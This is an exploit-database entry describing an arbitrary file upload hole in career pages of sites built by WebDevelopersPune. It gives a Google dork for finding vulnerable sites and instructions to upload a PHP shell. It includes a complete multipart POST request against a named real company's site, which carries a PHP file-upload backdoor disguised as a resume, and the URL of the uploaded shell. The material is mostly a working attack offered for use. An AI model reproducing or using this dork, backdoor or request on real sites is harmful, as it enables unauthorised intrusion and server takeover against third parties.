Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| N/A | CWE-434 | Unknown | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| WebDevelopersPune | High | Remote | 2019-05-06 |
##############################################################
# Title : Design by WebDevelopersPune Arbitrary File Upload Vulnerability
# Author : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
# Date : /06/05/2019
# Home : Annaba ( Algeria )
# Tested on : Linux ( Backbox )
# Vendor : http://www.webdeveloperspune.com
# Dork : intext:"Design by WebDevelopersPune"
###############################################################
[ 1 ] Search in google : intext:"Design by WebDevelopersPune" "careers"
[ 2 ] Choose URL then upload your php shell
[ 3 ] http://localhost:80/uploadcv/ [ PHP BACKDOOR ]
Example :
--------------------------------------------------------------------------
http://www.electropotentinfotech.com/careers.html
--------------- POST REQUEST ------------------------------------
POST /careers_mail.php HTTP/1.1
Host: www.electropotentinfotech.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.electropotentinfotech.com/careers.html
Cookie: _ga=GA1.2.1600898550.1557157559; _gid=GA1.2.1741193570.1557157559; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------10837544701235829337682045570
Content-Length: 1872
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="fname"
omg
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="lname"
omg
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presentd"
ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presente"
ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="yer"
2
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="mnth"
6
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="presentl"
ff
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="resume"; filename="up.PhP2"
Content-Type: application/octet-stream
<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}echo '<html><head><title>Upload files...Bassemdz IN</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="discription"
ok
-----------------------------10837544701235829337682045570
Content-Disposition: form-data; name="submit"
-----------------------------10837544701235829337682045570--
---------------------------------------------------------------------------------------------------------------
[ + ] http://www.electropotentinfotech.com/uploadcv/190506092639up.PhP2
---------------------------------------------------------------------------------------------------------------
Copyright ©2024 Exploitalert.